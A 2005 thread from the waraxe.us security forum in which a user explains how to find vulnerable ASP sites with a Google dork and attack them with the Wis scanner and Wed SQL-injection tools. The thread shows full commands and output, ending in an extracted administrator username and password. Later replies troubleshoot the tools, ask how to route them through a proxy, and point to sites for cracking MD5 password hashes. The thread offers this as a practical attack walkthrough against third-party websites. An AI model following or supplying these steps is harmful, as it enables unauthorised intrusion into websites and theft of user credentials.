Waraxe IT Security Portal
Login or Register
March 11, 2025
Members List
IRC chat
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
Sql Char Encoder
y3dips ITsec
Md5 Cracker
User Manuals
Recommend Us
Your Account
User Info
Welcome, Anonymous

Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 57
Members: 0
Total: 57
Full disclosure
SEC Consult SA-20250226-0 :: Multiple vulnerabilities in Siemens A8000 CP-8050 & CP-8031 PLC
Re: MitM attack against OpenSSH's VerifyHostKeyDNS-enabled client
MitM attack against OpenSSH's VerifyHostKeyDNS-enabled client
Self Stored XSS - acp2sev7.2.2
Python's official documentation contains textbook example of insecure code (XSS)
Re: Netgear Router Administrative Web Interface Lacks Transport Encryption By Default
Monero 18.3.4 zero-day DoS vulnerability has been droppedpublicly on social network.
Netgear Router Administrative Web Interface Lacks Transport Encryption By Default
[CVE-2024-54756] GZDoom <= 4.13.1 Arbitrary Code Execution viaMalicious ZScript
Re: Text injection on https://www.google.com/so rry/index via ?q parameter (no XSS)
SEC Consult SA-20250211-0 :: Multiple vulnerabilities in Wattsense Bridge
APPLE-SA-02-10-2025-2 iPadOS 17.7.5
APPLE-SA-02-10-2025-1 iOS 18.3.1 and iPadOS 18.3.1
CVE-2024-55447: Access Control in Paxton Net2 software (update)
ChatGPT AI finds "security concern" (XSS) in DeepSeek's code
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Sql injection tools Wed&Wis Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
Sql injection tools Wed&Wis
PostPosted: Thu Jan 13, 2005 4:02 pm Reply with quote
Regular user
Regular user
Joined: Nov 21, 2004
Posts: 11
Location: Estonia

I found 2 tools to automate the sql injection process. I tested them and got some users/passwds Smile My tests also showed that it missed some sql injections Sad
Here's how to use them:
First i searched with google some asp sites like this "allinurl:/login.asp". Next i used Wis (Web Injection Scanner - searches web for sql injection) and if it found hole then i started Wed (Web Entry Detector) to exploit the injection. Tools can be downloaded from here:
It goes like this:


C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:


To detect access pages, put a "/A" to the end of command:


C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
/gansu2/login.asp (200 OK)

Scan Finished


When you successfully find Sql Injection with Wis then next step is to use Wed and the vulnerable url:


C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn


Happy Injecting Razz
View user's profile Send private message MSN Messenger
PostPosted: Thu Jan 13, 2005 10:28 pm Reply with quote
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

nice found


We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
View user's profile Send private message
PostPosted: Fri Jan 14, 2005 7:08 pm Reply with quote
Active user
Active user
Joined: Dec 02, 2004
Posts: 26

very good toolz thanks qr4t Very Happy
View user's profile Send private message
This Tools is China Hacker rongxiao Public
PostPosted: Sat Jan 15, 2005 3:42 pm Reply with quote
Joined: Jan 15, 2005
Posts: 2


is very good
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Sat Jan 15, 2005 5:29 pm Reply with quote
Regular user
Regular user
Joined: Nov 29, 2004
Posts: 7


{ [ NCT ] }
View user's profile Send private message
PostPosted: Tue Jan 18, 2005 5:35 am Reply with quote
Joined: Jan 18, 2005
Posts: 1

Hi, the first of all, sorry for my very very very bad english Embarassed
Congratulations for the wis & wed programs. Very Happy
I have a problem. The first step with the wis, it's ok!, an example i got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)

Access Page Final Result:
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)

Now, I not that to do with these results, in step 2 with the wed program Crying or Very sad
Anyone can help me please?
Sorry one more time for my bad english Embarassed
View user's profile Send private message
What about using proxy with the wis usage ?
PostPosted: Tue Jan 18, 2005 3:34 pm Reply with quote
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

is there a -p or anything in the usage to use proxy .. ?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Tue Jan 18, 2005 6:09 pm Reply with quote
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

HEllo again ..i have run this expl from another pc and i have managed to get to the point where it is using brute force

#### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5

#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
Brute Force "administrators": ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed>

and while it is working the program crashes...any ideas y?
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Fri Mar 18, 2005 9:53 pm Reply with quote
Joined: Mar 18, 2005
Posts: 1

#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I cant log in with this info!
View user's profile Send private message
PostPosted: Tue Mar 29, 2005 8:46 am Reply with quote
Regular user
Regular user
Joined: Jun 20, 2004
Posts: 5

it come from china!
View user's profile Send private message
PostPosted: Wed Mar 30, 2005 10:32 am Reply with quote
Joined: Feb 12, 2005
Posts: 3

whay i got this error admin.txt not fond ı have admin.txt in same directory can some one help me.. Question
View user's profile Send private message
PostPosted: Tue Jul 05, 2005 10:00 pm Reply with quote
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18

wis seemed don't work for me , but wed , no problem .

understand.. when I launch wis , with or without param , the program stop , without checking anything.. no error message , nothing , just stop .
View user's profile Send private message
hashed password
PostPosted: Thu Jul 07, 2005 4:31 pm Reply with quote
Regular user
Regular user
Joined: Jul 04, 2005
Posts: 6

kunfuzed wrote:
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I cant log in with this info!

Well if the password is hashed with md5 algorthm try using this:
If it is sha1 or not salted md5 try http://passcracking.com/
View user's profile Send private message
PostPosted: Thu Jul 07, 2005 6:10 pm Reply with quote
Regular user
Regular user
Joined: Jun 27, 2005
Posts: 22

downloaded it, how do i use it?
View user's profile Send private message
PostPosted: Thu Jul 14, 2005 12:37 pm Reply with quote
Regular user
Regular user
Joined: Jul 04, 2005
Posts: 6

md5crack xxx
xxx - type your hash here
View user's profile Send private message
Sql injection tools Wed&Wis
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic

Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.048 Seconds